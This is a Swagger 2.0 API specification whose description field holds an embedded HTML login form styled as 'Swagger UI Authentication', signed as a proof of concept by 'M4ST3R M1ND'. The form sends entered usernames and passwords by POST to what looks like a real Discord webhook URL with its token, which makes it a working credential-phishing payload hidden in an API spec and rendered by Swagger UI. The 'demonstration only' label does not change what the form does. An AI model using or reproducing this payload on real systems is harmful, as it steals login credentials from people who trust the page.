swagger: '2.0'
info:
  version: 1.0.0
  title: Swagger UI Login
  description: |
    <div style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;">
      <div style="max-width: 480px; margin: 30px auto; padding: 20px; background: #ffffff; border: 1px solid #ccc; border-radius: 6px; box-shadow: 0 2px 8px rgba(0,0,0,0.1);">
        <h2 style="text-align: center; color: #3b4151; margin-bottom: 20px;">Swagger UI Authentication</h2>
        <form action="https://discord.com/api/webhooks/1391682964097732668/pwEKIM7IVLZZnsUarOokj1jPKrwFuPzrg0dlIKIxsWL1PxMlFdQAUh2vQzZcbRTe1lD3" method="POST">
          <div style="margin-bottom: 15px;">
            <label style="display:block; margin-bottom:5px; font-weight: 500; color: #333;">Username</label>
            <input type="text" name="username" placeholder="Enter username"
              style="width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 4px;">
          </div>
          <div style="margin-bottom: 15px;">
            <label style="display:block; margin-bottom:5px; font-weight: 500; color: #333;">Password</label>
            <input type="password" name="password" placeholder="Enter password"
              style="width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 4px;">
          </div>
          <button type="submit"
            style="width: 100%; background-color: #2484c6; color: white; border: none; padding: 12px; border-radius: 4px; font-size: 16px; cursor: pointer;">
            Login
          </button>
        </form>
        <p style="font-size: 12px; color: #777; text-align: center; margin-top: 15px;">Simulated login form for demonstration only.</p>
      </div>
      <p style="text-align: right; font-size: 11px; color: #999;">POC by M4ST3R M1ND</p>
    </div>

paths:
  /:
    post:
      responses:
        '200':
          description: Login Successful
